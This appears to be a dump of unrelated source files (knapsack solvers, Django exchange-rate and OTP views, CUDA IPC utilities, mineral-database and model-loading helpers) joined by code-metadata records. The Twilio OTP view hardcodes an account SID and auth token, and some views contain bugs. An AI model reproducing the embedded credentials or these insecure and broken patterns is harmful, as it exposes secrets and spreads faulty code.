"api_name": "pygame.font.Font",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.Font"... |
30167619288 | from itertools import combinations
import random
# If true, extra inforamtion will appear
DEBUG = False
def greedy(v, w, W):
    """Greedy knapsack by value density, O(n log n).

    Items are considered in decreasing value/weight order; the scan stops
    at the first item that no longer fits (later items are not tried).

    Args:
        v: Item values.
        w: Item weights.
        W: Knapsack capacity.

    Returns:
        Boolean list: True where the item was taken.
    """
    # Stable sort keeps equal-density items in their original order,
    # matching the tuple-based sort of the previous implementation.
    order = sorted(range(len(w)), key=lambda i: v[i] / w[i], reverse=True)
    taken = [False] * len(w)
    remaining = W
    for i in order:
        if w[i] > remaining:
            return taken
        taken[i] = True
        remaining -= w[i]
    return taken
def dynamic(v, w, W):
    """Exact 0/1 knapsack via dynamic programming, O(n*W).

    Args:
        v: Item values.
        w: Item weights.
        W: Knapsack capacity.

    Returns:
        Boolean selection list maximizing total value within capacity W.
    """
    n = len(v)
    # table[i][j]: best value using the first i items with capacity j.
    table = [[0] * (W + 1) for _ in range(n + 1)]
    for item in range(1, n + 1):
        for cap in range(1, W + 1):
            if w[item - 1] <= cap:
                table[item][cap] = max(
                    v[item - 1] + table[item - 1][cap - w[item - 1]],
                    table[item - 1][cap],
                )
            else:
                table[item][cap] = table[item - 1][cap]
    # Trace back which items contributed to the optimum.
    chosen = [False] * n
    item, cap = n, W
    while item > 0 and cap > 0:
        if table[item][cap] == table[item - 1][cap]:
            item -= 1
        else:
            chosen[item - 1] = True
            cap -= w[item - 1]
            item -= 1
    return chosen
#O(2^n)
def bruteforce(v, w, W):
    """Exhaustive 0/1 knapsack: try every subset, keep the best that fits.

    Args:
        v: Item values.
        w: Item weights.
        W: Knapsack capacity.

    Returns:
        Boolean selection list of the best subset (all False when nothing
        fits, consistent with greedy()/dynamic()).
    """
    n = len(v)
    best = [False] * n
    best_value = 0
    # Combine over item *indices*, not (weight, value) tuples: the previous
    # implementation used tuples.index(), which always returns the first
    # occurrence and therefore mis-attributed duplicate items. It also
    # returned [] instead of [False]*n when nothing fit.
    for size in range(1, n + 1):
        for subset in combinations(range(n), size):
            weight = sum(w[i] for i in subset)
            value = sum(v[i] for i in subset)
            if value > best_value and weight <= W:
                best_value = value
                best = [False] * n
                for i in subset:
                    best[i] = True
    return best
# NOTE(review): previously labeled O(n); the loop structure is roughly
# O(MAX_GEN * POP_SIZE * N) including the fitness-sorted generations.
def genetic(v, w, W, POP_SIZE=10, MAX_GEN=200):
    """Approximate 0/1 knapsack with a simple genetic algorithm.

    Individuals are 0/1 selection vectors of length len(v); fitness is
    the total value, or 0 when the weight exceeds W. Results are
    randomized and not guaranteed optimal.

    Args:
        v: Item values.
        w: Item weights.
        W: Knapsack capacity.
        POP_SIZE: Individuals per generation.
        MAX_GEN: Number of generations to evolve.

    Returns:
        The best individual found (list of 0/1 ints), or a list of False
        when even the best has fitness 0.
    """
    N = len(v)
    PARENTS_PERCENTAGE = 0.4   # top fraction kept as parents each round
    MUTATION_CHANCE = 0.2      # per-individual bit-flip probability
    PARENT_CHANCE = 0.1        # chance for a non-elite to still parent
    def fitness(perm):
        # Total value of the selection; 0 when over capacity.
        value = 0
        weight = 0
        index = 0
        for i in perm:
            if index >= N:
                break
            if (i == 1):
                value += v[index]
                weight += w[index]
            index += 1
        if weight > W: return 0
        else: return value
    def generate_population(number_of_individuals):
        # Random 0/1 vectors of length N.
        return [[random.randint(0,1) for x in range (0,N)] for x in range (0,number_of_individuals)]
    def mutate(perm):
        # Flip one randomly chosen bit in place.
        r = random.randint(0,len(perm)-1)
        if (perm[r] == 1): perm[r] = 0
        else: perm[r] = 1
    def evolve(perm):
        # Keep the elite, maybe adopt some non-elites, mutate a few, then
        # fill back up with half-and-half crossover children.
        parents_length = int(PARENTS_PERCENTAGE*len(perm))
        parents = perm[:parents_length]
        nonparents = perm[parents_length:]
        for np in nonparents:
            if PARENT_CHANCE > random.random():
                parents.append(np)
        for p in parents:
            if MUTATION_CHANCE > random.random():
                mutate(p)
        children = []
        desired_length = len(perm) - len(parents)
        while len(children) < desired_length :
            m = perm[random.randint(0,len(parents)-1)]
            f = perm[random.randint(0,len(parents)-1)]
            half = round(len(m)/2)
            child = m[:half] + f[half:]
            if MUTATION_CHANCE > random.random():
                mutate(child)
            children.append(child)
        parents.extend(children)
        return parents
    generation = 1
    population = generate_population(POP_SIZE)
    for g in range(0,MAX_GEN):
        if DEBUG: print (f"Generation {generation} with {len(population)}")
        # Sort best-first so evolve() treats the head as the elite.
        population = sorted(population, key=lambda x: fitness(x), reverse=True)
        if DEBUG:
            for i in population:
                print(f"{i}, fit: {fitness(i) }")
        population = evolve(population)
        generation += 1
    # NOTE(review): population is not re-sorted after the final evolve(),
    # so population[0] is not necessarily the fittest individual.
    if (fitness(population[0]) == 0): return [False for i in range(N)]
    else: return population[0]
{
"api_name": "itertools.combinations",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "random.random",
... |
41903865929 | import sys
from django.db.models import Avg, Variance
from django.shortcuts import render
from rest_framework import generics
from rest_framework.decorators import api_view, parser_classes
from rest_framework.generics import ListCreateAPIView
from rest_framework.parsers import JSONParser
from rest_framework.response import Response
from rest_framework import status
import json
from rest_framework.views import APIView
import collections
from .models import ExchangeRate, Currency
from .model_serializer import ExchangeRateSerializer, ExchangeRateListSerializer
# NOTE(review): these module-level names are not referenced anywhere in
# this module (the list view defines its own queryset/serializer); they
# look like leftovers — confirm no external import before removing.
query_set = ExchangeRate.objects.all()
serializer_class = ExchangeRateSerializer
@api_view(['GET'])
def test_get(request):
    """Smoke-test endpoint: logs the 'q' query param, returns a greeting."""
    print("request:", request.query_params.get("q"))
    return Response({"message": "Hello, world!"})
@api_view(['POST'])
@parser_classes((JSONParser,))
def crate_exchange_rate(request):
    """Create or update the rate for (date, from_currency, to_currency).

    JSON body keys: date, from_currency, to_currency, rate_value.
    NOTE(review): function name typo ('crate'); renaming would break the
    URLconf import, so it is left as-is.
    """
    request_data = request.data
    date = request_data['date']
    from_currency = request_data['from_currency']
    to_currency = request_data['to_currency']
    rate_value = request_data['rate_value']
    # Upsert: reuse the existing row for the same key, else create one.
    exchange_rate_ls = ExchangeRate.objects.filter(date=date, from_currency=from_currency, to_currency=to_currency)
    exchange_rate = ExchangeRate()
    if exchange_rate_ls:
        exchange_rate = exchange_rate_ls[0]
        exchange_rate.rate_value = rate_value
    else:
        from_curr = Currency.objects.get(currency_code=from_currency)
        to_curr = Currency.objects.get(currency_code=to_currency)
        exchange_rate.date = date
        exchange_rate.from_currency = from_curr
        exchange_rate.to_currency = to_curr
        exchange_rate.rate_value = rate_value
    exchange_rate.save()
    return Response(ExchangeRateSerializer(exchange_rate).data, status=status.HTTP_200_OK)
def get_rate_average(rate_date, previous_date, from_curr, to_curr):
    """Average rate for a currency pair over [previous_date, rate_date].

    Returns the ORM aggregate dict {'rate_value__avg': ...} (the value is
    None when no rows match).
    """
    from django.db.models import Avg
    return ExchangeRate.objects.filter(date__range=(previous_date, rate_date), from_currency=from_curr,
                                       to_currency=to_curr).aggregate(Avg('rate_value'))
from collections import OrderedDict
def ordered_dict_prepend(dct, key, value, dict_setitem=dict.__setitem__):
    """Insert (or move) *key* at the front of an OrderedDict, in place.

    The previous implementation manipulated the private
    _OrderedDict__root / _OrderedDict__map linked-list attributes, which
    do not exist on the C implementation of OrderedDict in Python 3 and
    raise AttributeError there. move_to_end(last=False) is the supported
    equivalent and handles both new and existing keys.

    Args:
        dct: collections.OrderedDict to modify in place.
        key: Key to place first.
        value: Value to associate with *key*.
        dict_setitem: Unused; kept for backward signature compatibility.
    """
    dct[key] = value
    dct.move_to_end(key, last=False)
class GetExchangeLIst(ListCreateAPIView):
    """List/create endpoint exposing every stored exchange rate."""
    # NOTE(review): class name typo ('LIst'); renaming would break the
    # URLconf import, so it is left as-is.
    queryset = ExchangeRate.objects.none()  # placeholder; see get_queryset
    serializer_class = ExchangeRateSerializer

    def get_queryset(self):
        # Always return the full table regardless of the class attribute.
        queryset = ExchangeRate.objects.all()
        return queryset
@api_view(['GET'])
def get_exchange_track(request):
    """List all rates for a date, each with its trailing-window average.

    Query params:
        date: Day to list (YYYY-MM-DD).
        offset: Days before 'date' defining the averaging window.

    Returns 404 when either parameter is missing.
    """
    print("request_data", request.query_params)
    rate_date = request.query_params.get("date")
    if not rate_date:
        return Response('Invalid Date parameter', status=status.HTTP_404_NOT_FOUND)
    offset = request.query_params.get("offset")
    if not offset:
        return Response('Invalid Offset parameter', status=status.HTTP_404_NOT_FOUND)
    from datetime import datetime, timedelta
    previous_date = datetime.strptime(rate_date, "%Y-%m-%d").date() - timedelta(days=int(offset))
    exchange_list = ExchangeRate.objects.filter(date=rate_date)
    response_serializer = ExchangeRateSerializer(exchange_list, many=True)
    # One averaging query per currency pair present on the requested day,
    # keyed 'FROM-TO'.
    average_dict = {er.from_currency.currency_code+'-'+er.to_currency.currency_code: get_rate_average(rate_date, previous_date, er.from_currency,
                                               er.to_currency) for er in exchange_list}
    print(response_serializer.data)
    result_list =[]
    for d in response_serializer.data:
        # Attach the window average to each serialized rate row.
        d['average_val'] = average_dict[d['from_currency']+'-'+d['to_currency']]['rate_value__avg']
        result_list.append(d)
    return Response(result_list)
@api_view(['GET'])
def get_exchange_average(request):
    """Return the last *offset* rates for a pair plus average and variance.

    Query params: from_currency, to_currency, offset (count of most
    recent rows, newest first). The response dict is keyed 1..n for the
    rows, with key n+1 holding {'average_val', 'variance'}.
    """
    from_currency = request.query_params.get("from_currency")
    if not from_currency:
        return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
    to_currency = request.query_params.get("to_currency")
    if not to_currency:
        return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
    offset = request.query_params.get("offset")
    if not offset:
        return Response('Invalid Offset parameter', status=status.HTTP_404_NOT_FOUND)
    from_curr = Currency.objects.get(currency_code=from_currency)
    to_curr = Currency.objects.get(currency_code=to_currency)
    _vals ={'from_currency':from_curr,'to_currency':to_curr}
    from django.db.models import Q
    # Most recent 'offset' rows for the pair.
    exchange_rate_list = ExchangeRate.objects.filter(Q(from_currency=from_curr) & Q(to_currency=to_curr)).order_by('-date')[:int(offset)]
    response_serializer = ExchangeRateSerializer(exchange_rate_list, many=True)
    avr_val = exchange_rate_list.aggregate(Avg('rate_value'))
    variance = exchange_rate_list.aggregate(Variance('rate_value'))
    aver_var = collections.OrderedDict()
    aver_var['average_val'] =avr_val
    aver_var['variance'] =variance
    data = response_serializer.data
    i =0
    dict_response ={}
    # Number the rows 1..n, then append the stats under key n+1.
    for d in data:
        i=i+1
        dict_response[i]=d
    dict_response[i+1]=aver_var
    print(data)
    return Response(dict_response)
@api_view(['DELETE'])
def delete_exchange(request):
from_currency = request.query_params.get("from_currency")
if not from_currency:
return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
to_currency = request.query_params.get("to_currency")
if not to_currency:
return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
date = request.query_params.get("date")
if not date:
return Response('Invalid Date parameter', status=status.HTTP_404_NOT_FOUND)
import datetime
date_to_delete = datetime.strptime(date, "%Y-%m-%d").date()
from_curr = Currency.objects.get(currency_code=from_currency)
to_curr = Currency.objects.get(currency_code=to_currency)
from django.db.models import Q
ExchangeRate.objects.objects.filter(Q(from_currency=from_curr) & Q(to_currency=to_curr) & Q(date=date_to_delete)).delete()
return Response("Deleted data",status=status.HTTP_200_OK) | harjiwiga/exchange_rate | exchangerateapp/views.py | views.py | py | 6,788 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.ExchangeRate.objects.all",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "models.ExchangeRate.objects",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "models.ExchangeRate",
"line_number": 18,
"usage_type": "name"
},
{
... |
7052172062 |
from django.core.context_processors import csrf
from django.shortcuts import render_to_response
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from forms import RegistrationForm, VerificationForm
from .models import User
from twilio.rest import Client
# from django_otp.models import Device
# from django_otp.oath import TOTP
# Create your views here.
def otp_register(request):
if request.method == 'POST':
form = RegistrationForm(request.POST)
account_sid = 'ACb78b2fd3a07bfb51bc243bbc8b1a08f5' # Found on Twilio Console Dashboard
auth_token = 'd3892a335ca6e3a1a1d6dc80dddb81b8' # Found on Twilio Console Dashboard
# Phone number you used to verify your Twilio account
TwilioNumber = '+13182257674' # Phone number given to you by Twilio
client = Client(account_sid, auth_token)
if form.is_valid():
user = form.save()
phone_number = form.cleaned_data.get('phone_number')
token_number = user.token_number
if user.id:
client.api.account.messages.create(
to=phone_number,
from_=TwilioNumber,
body='I sent a text message from Python!'+str(token_number))
# user.twiliosmsdevice_set.create(name='SMS',key=token_number, number=phone_number)
# device = user.twiliosmsdevice_set.get()
# device.generate_challenge()
return HttpResponseRedirect('/otp/verify/'+str(user.id))
else:
form = RegistrationForm()
context = {}
context.update(csrf(request))
context['form'] = form
return render_to_response('register.html', context)
def otp_login(request):
if request.method == 'POST':
username = request.POST.get('username', '')
password = request.POST.get('password', '')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
if request.POST.get('next') != 'None':
return HttpResponseRedirect(request.POST.get('next'))
return HttpResponse('User ' + user.username + ' is logged in.' +
'<p>Please <a href="/otp/status/">click here</a> to check verification status.</p>')
else:
return HttpResponse('User is invalid!' +
'<p>Please <a href="/otp/login/">click here</a> to login.</p>')
else:
form = AuthenticationForm()
context = {}
context['next'] = request.GET.get('next')
context.update(csrf(request))
context['form'] = form
return render_to_response('login.html', context)
@login_required(login_url='/otp/login')
def otp_verify(request,pk):
user_data = User.objects.filter(pk=pk)[0]
username = user_data.username
token_number = user_data.token_number
if request.method == 'POST':
form = VerificationForm(request.POST)
token = form.getToken()
if token:
user = User.objects.get_by_natural_key(request.user.username)
# token_number = form.cleaned_data.get('token_number')
# device = user.twiliosmsdevice_set.get()
# device = django_otp.devices_for_user(user)
if user:
# status = device.verify_token(token)
# if status:
if int(token_number) == int(token):
user.is_verified = True
user.save()
return HttpResponse('User: ' + username + '\n' + 'Verified.' +
'<p>Please <a href="/otp/logout/">click here</a> to logout.</p>')
else:
return HttpResponse('User: ' + username + '\n' + 'could not be verified.' +
'<p><a href="/otp/verify/'+str(pk)+'">Click here to generate new token</a></P>')
else:
return HttpResponse('User: ' + username + ' Worng token!' +
'<p><a href="/otp/verify/'+str(pk)+'">Click here to generate new token</a></P>')
else:
form = VerificationForm()
context = {}
context.update(csrf(request))
context['form'] = form
return render_to_response('verify.html', context)
@login_required(login_url='/otp/login')
def otp_token(request):
user = User.objects.get_by_natural_key(request.user.username)
# device = user.twiliosmsdevice_set.get()
# device.generate_challenge()
return HttpResponseRedirect('/otp/verify')
def otp_status(request):
if request.user.username:
user = User.objects.get_by_natural_key(request.user.username)
if user.is_verified:
return HttpResponse(user.username + ' is verified.' +
'<p>Please <a href="/otp/logout/">click here</a> to logout.</p>')
else:
return HttpResponse(user.username + ' is not verified.' +
'<p><a href="/otp/verify/'+str(user.id)+'">Click here to generate new token</a></P>')
return HttpResponse('<p>Please <a href="/otp/login/">login</a> to check verification status.</p>')
def otp_logout(request):
logout(request)
return HttpResponse('You are logged out.' +
'<p>Please <a href="/otp/login/">click here</a> to login.</p>')
| sawardekar/Django_OTP | otpapp/views.py | views.py | py | 5,575 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "forms.RegistrationForm",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "twilio.rest.Client",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 35,
"usage_type": "call"
},
{
"api_na... |
5049967399 | import array
import struct
from contextlib import contextmanager
from typing import List, Tuple
from cuda import cudart
from cuda.cudart import cudaError_t
from .mapping import Mapping
def _raise_if_error(error: cudaError_t):
if error != cudaError_t.cudaSuccess:
raise RuntimeError(error)
@contextmanager
def peer_access(mapping: Mapping):
set_peer_access(mapping, True)
try:
yield
finally:
set_peer_access(mapping, False)
def set_peer_access(mapping: Mapping, enabled: bool = True):
src_node = mapping.rank
for dest_node in mapping.tp_group:
if dest_node == src_node:
continue
error, result = cudart.cudaDeviceCanAccessPeer(src_node, dest_node)
_raise_if_error(error)
if result == 0:
raise RuntimeError(
f"Can't enable access between nodes {src_node} and {dest_node}")
if enabled:
cudart.cudaDeviceEnablePeerAccess(dest_node, 0)
else:
cudart.cudaDeviceDisablePeerAccess(dest_node)
error = cudart.cudaGetLastError()[0]
if error not in [
cudaError_t.cudaSuccess,
cudaError_t.cudaErrorPeerAccessAlreadyEnabled,
cudaError_t.cudaErrorPeerAccessNotEnabled
]:
raise RuntimeError(error)
class IpcMemory():
IPC_BUFFERS_SIZE = 50331648
IPC_BARRIERS_SIZE_PER_GPU = 25 * 4 # Max all reduce blocks * sizeof(float)
def __init__(self, mapping, size):
self.mapping = mapping
self.peer_ptrs, self.local_ptr = IpcMemory.open_ipc_memory(
self.mapping, size, True)
def __del__(self):
IpcMemory.close_ipc_memory(self.mapping, self.peer_ptrs)
def serialize(self) -> List[int]:
buffer = bytes(0)
for ptr in self.peer_ptrs:
buffer += struct.pack("P", ptr)
return array.array("Q", buffer).tolist()
@staticmethod
def open_ipc_memory(mapping: Mapping,
size: int,
set_to_zero: bool = False) -> Tuple[List[int], int]:
""" Allocates a buffer with the given *size* on each GPU. Then, enables IPC communication between TP groups.
Returns a list of buffer pointers, buffers[i] is a handle to the corresponding buffer residing on GPU #i.
Call close_ipc_handle with the *buffer*.
"""
from mpi4py import MPI
comm = MPI.COMM_WORLD.Split(mapping.pp_rank, mapping.tp_rank)
error, local_ptr = cudart.cudaMalloc(size)
_raise_if_error(error)
if set_to_zero:
_raise_if_error(cudart.cudaMemset(local_ptr, 0, size)[0])
error, local_handle = cudart.cudaIpcGetMemHandle(local_ptr)
_raise_if_error(error)
handles_reserved = comm.allgather(local_handle.reserved)
handles = []
for reserved in handles_reserved:
handle = cudart.cudaIpcMemHandle_t()
handle.reserved = reserved
handles.append(handle)
peer_ptrs = []
for node, handle in enumerate(handles):
if node == mapping.tp_rank:
peer_ptrs.append(local_ptr)
else:
error, ptr = cudart.cudaIpcOpenMemHandle(
handle, cudart.cudaIpcMemLazyEnablePeerAccess)
_raise_if_error(error)
peer_ptrs.append(ptr)
return peer_ptrs, local_ptr
@staticmethod
def close_ipc_memory(mapping: Mapping, peer_ptrs: List[int]):
for node, ptr in enumerate(peer_ptrs):
if node == mapping.tp_rank:
_raise_if_error(cudart.cudaFree(ptr)[0])
else:
_raise_if_error(cudart.cudaIpcCloseMemHandle(ptr)[0])
| NVIDIA/TensorRT-LLM | tensorrt_llm/_ipc_utils.py | _ipc_utils.py | py | 3,753 | python | en | code | 3,328 | github-code | 36 | [
{
"api_name": "cuda.cudart.cudaError_t",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "cuda.cudart.cudaError_t.cudaSuccess",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "cuda.cudart.cudaError_t",
"line_number": 13,
"usage_type": "name"
},
... |
36963468353 | import setuptools
with open("README.md") as fh:
long_description = fh.read()
setuptools.setup(
name="pysqueezebox",
version="0.7.1",
license="apache-2.0",
author="Raj Laud",
author_email="raj.laud@gmail.com",
description="Asynchronous library to control Logitech Media Server",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/rajlaud/pysqueezebox",
packages=setuptools.find_packages(),
python_requires=">=3.6",
install_requires=["aiohttp", "async-timeout"],
)
| rajlaud/pysqueezebox | setup.py | setup.py | py | 572 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 16,
"usage_type": "call"
}
] |
4705074588 | import functools
import pandas as pd
import numpy as np
import periodictable as pt
from pathlib import Path
from tinydb import TinyDB, Query
from .transform import formula_to_elemental
from ..util.meta import pyrolite_datafolder
from ..util.database import _list_tindyb_unique_values
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
logger = logging.getLogger(__name__)
__dbpath__ = pyrolite_datafolder(subfolder="mineral") / "mindb.json"
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_groups():
"""
List the mineral groups present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("group", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_minerals():
"""
List the minerals present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("name", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None) # cache outputs for speed
def list_formulae():
"""
List the mineral formulae present in the mineral database.
Returns
----------
:class:`list`
"""
return _list_tindyb_unique_values("formula", dbpath=__dbpath__)
def get_mineral(name="", dbpath=None):
"""
Get a specific mineral from the database.
Parameters
------------
name : :class:`str`
Name of the desired mineral.
dbpath : :class:`pathlib.Path`, :class:`str`
Optional overriding of the default database path.
Returns
--------
:class:`pd.Series`
"""
if dbpath is None:
dbpath = __dbpath__
assert name in list_minerals()
with TinyDB(str(dbpath)) as db:
out = db.get(Query().name == name)
return pd.Series(out)
def parse_composition(composition, drop_zeros=True):
"""
Parse a composition reference and return the composiiton as a :class:`~pandas.Series`
Parameters
-----------
composition : :class:`str` | :class:`periodictable.formulas.Formula`
"""
mnrl = None
if composition in list_minerals():
mnrl = get_mineral(composition)
try: # formulae
form = pt.formula(composition)
mnrl = pd.Series(formula_to_elemental(form))
# could also check for formulae in the database, using f.atoms
except:
pass
assert mnrl is not None
if drop_zeros:
mnrl = mnrl[mnrl != 0]
return mnrl
def get_mineral_group(group=""):
"""
Extract a mineral group from the database.
Parameters
-----------
group : :class:`str`
Group to extract from the mineral database.
Returns
---------
:class:`pandas.DataFrame`
Dataframe of group members and compositions.
"""
assert group in list_groups()
with TinyDB(str(__dbpath__)) as db:
grp = db.search(Query().group == group)
df = pd.DataFrame(grp)
meta, chem = (
["name", "formula"],
[i for i in df.columns if i not in ["name", "formula", "group"]],
)
df = df.reindex(columns=meta + chem)
df.loc[:, chem] = df.loc[:, chem].apply(pd.to_numeric)
df = df.loc[:, (df != 0).any(axis=0)] # remove zero-only columns
return df
def update_database(path=None, **kwargs):
"""
Update the mineral composition database.
Parameters
-----------
path : :class:`str` | :class:`pathlib.Path`
The desired filepath for the JSON database.
Notes
------
This will take the 'mins.csv' file from the mineral pyrolite data folder
and construct a document-based JSON database.
"""
mindf = pd.read_csv(pyrolite_datafolder(subfolder="mineral") / "mins.csv")
mindf = mindf.reindex(
columns=mindf.columns.tolist()
+ [str(a) for a in pt.formula(" ".join(mindf.formula.to_list())).atoms]
)
for ix in mindf.index: # add elemental compositions
el = parse_composition(pt.formula(mindf.loc[ix, "formula"]))
mindf.loc[ix, el.index] = el
mindf = mindf.fillna(0.0)
if path is None:
path = __dbpath__
path = Path(path).with_suffix(".json")
# name group formula composition
with TinyDB(str(path)) as db:
db.purge()
for k, v in mindf.T.to_dict().items():
db.insert(v)
db.close()
| skerryvore/pyrolite | pyrolite/mineral/mindb.py | mindb.py | py | 4,362 | python | en | code | null | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.NullHandler",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "util.meta.pyr... |
74059611623 | from configs import ssd300 as cfg
import torch
import torchvision.transforms as transforms
def base_transform(size):
transform = transforms.Compose([
transforms.Resize(size),
transforms.ToTensor()
])
return transform
class BaseTransform:
def __init__(self, size, mean):
self.size = size
def __call__(self, image, boxes=None, labels=None):
return base_transform(self.size), boxes, labels
class VOCAnnotationTransform(object):
"""Transforms a VOC annotation into a Tensor of bbox coords and label index
Initilized with a dictionary lookup of classnames to indexes
Arguments:
class_to_ind (dict, optional): dictionary lookup of classnames -> indexes
(default: alphabetic indexing of VOC's 20 classes)
keep_difficult (bool, optional): keep difficult instances or not
(default: False)
height (int): height
width (int): width
"""
def __init__(self, class_to_ind=None, keep_difficult=False):
self.class_to_ind = class_to_ind or dict(
zip(cfg.VOC_CLASSES, range(len(cfg.VOC_CLASSES))))
self.keep_difficult = keep_difficult
def __call__(self, target, width, height):
"""
Arguments:
target (annotation) : the target annotation to be made usable
will be an ET.Element
Returns:
a list containing lists of bounding boxes [bbox coords, class name]
"""
res = []
for obj in target.iter('object'):
difficult = int(obj.find('difficult').text) == 1
if not self.keep_difficult and difficult:
continue
name = obj.find('name').text.lower().strip()
bbox = obj.find('bndbox')
pts = ['xmin', 'ymin', 'xmax', 'ymax']
bndbox = []
for i, pt in enumerate(pts):
cur_pt = int(bbox.find(pt).text) - 1
# scale height or width
cur_pt = cur_pt / width if i % 2 == 0 else cur_pt / height
bndbox.append(cur_pt)
label_idx = self.class_to_ind[name]
bndbox.append(label_idx)
res += [bndbox] # [xmin, ymin, xmax, ymax, label_ind]
# img_id = target.find('filename').text[:-4]
return res # [[xmin, ymin, xmax, ymax, label_ind], ... ]
| alswlsghd320/SSD_pytorch | datasets/transforms.py | transforms.py | py | 2,372 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torchvision.transforms.Compose",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "torchvision.transforms.Resize",
"line_number": 8,
"usage_type": "call"
},
{
"... |
17796457144 | from __future__ import absolute_import, division, print_function, unicode_literals
import uuid
from contextlib import contextmanager
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.backend.codegen.thrift.java.thrift_defaults import ThriftDefaults
from pants.build_graph.target import Target
from pants_test.test_base import TestBase
class TestThriftDefaults(TestBase):
def create_thrift_defaults(self, **options):
self.context(for_subsystems=[ThriftDefaults], options={
ThriftDefaults.options_scope: options
})
return ThriftDefaults.global_instance()
@contextmanager
def invalid_fixtures(self):
target = self.make_target(spec='not_java_thift_library_{}'.format(uuid.uuid4()),
target_type=Target)
thrift_defaults = self.create_thrift_defaults()
with self.assertRaises(ValueError):
yield thrift_defaults, target
def test_compiler_invalid(self):
with self.invalid_fixtures() as (thrift_defaults, target):
thrift_defaults.compiler(target)
def test_language_invalid(self):
with self.invalid_fixtures() as (thrift_defaults, target):
thrift_defaults.language(target)
def create_thrift_library(self, **kwargs):
return self.make_target(spec='java_thift_library_{}'.format(uuid.uuid4()),
target_type=JavaThriftLibrary,
**kwargs)
def test_compiler(self):
thrift_defaults = self.create_thrift_defaults(compiler='thrift')
self.assertEqual('thrift', thrift_defaults.compiler(self.create_thrift_library()))
self.assertEqual('scrooge',
thrift_defaults.compiler(self.create_thrift_library(compiler='scrooge')))
def test_language(self):
thrift_defaults = self.create_thrift_defaults(language='java')
self.assertEqual('java', thrift_defaults.language(self.create_thrift_library()))
self.assertEqual('scala',
thrift_defaults.language(self.create_thrift_library(language='scala')))
| fakeNetflix/twitter-repo-pants | tests/python/pants_test/backend/codegen/thrift/java/test_thrift_defaults.py | test_thrift_defaults.py | py | 2,046 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pants_test.test_base.TestBase",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "pants.backend.codegen.thrift.java.thrift_defaults.ThriftDefaults",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "pants.backend.codegen.thrift.java.thrift_defaults.... |
23195728404 | from django.http import HttpResponse
from django.shortcuts import render
from config import settings
#from email.message import EmailMessage
from django.core.mail import EmailMessage
# Create your views here.
def home(request):
return render(request,"index.html")
def send_email(request):
if request.method=='POST':
name=request.POST['name']
sender_email=request.POST['email']
msg=request.POST['msg']
phone=request.POST['phone']
email=EmailMessage(
f'Xabar qoldiruvchi: {sender_email}',
f'Ismi: {name}\nXabari: {msg}\nTel raqami: {phone}',
settings.EMAIL_HOST_USER,
[sender_email]
)
email.fail_silently=True
email.send()
return HttpResponse("Muvaffaqiyatli jo'natildi")
else:
return HttpResponse("Jo'natilmadi") | utkir-dev/Send-Email | smtp/views.py | views.py | py | 855 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "django.core.mail.EmailMessage",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "config.settings.EMAIL_HOST_USER",
"line_number": 22,
"usage_type": "attribute"
},... |
72152970345 | import os, glob, math
import numpy as np
import tensorflow as tf
from PIL import Image
from myutils_tf import bwutils
def save_4ch_to_3ch(path_pixel_shift):
print(path_pixel_shift)
files = glob.glob(os.path.join(path_pixel_shift, '*.npy'))
# print(files)
for idx, file in enumerate(files):
if '3ch' not in file:
arr = np.load(file)
arr_3ch = arr[:,:,(0,1,3)]
file_new = file[:-4] + '_3ch.npy'
np.save(file_new, arr_3ch)
def get_model(model_name, model_sig):
base_path = os.path.join('model_dir', 'checkpoint')
structure_path = os.path.join(base_path, model_name + '_model_structure.h5')
ckpt_path = os.path.join(base_path, model_name + '_' + model_sig)
print(structure_path, '\n', ckpt_path)
# load model structure
model = tf.keras.models.load_model(structure_path)
# find latest weights and load
ckpts = glob.glob(os.path.join(ckpt_path, '*.h5'))
ckpts.sort()
ckpt = ckpts[-1]
model.load_weights(ckpt)
# print(ckpt)
# model.summary()
return model
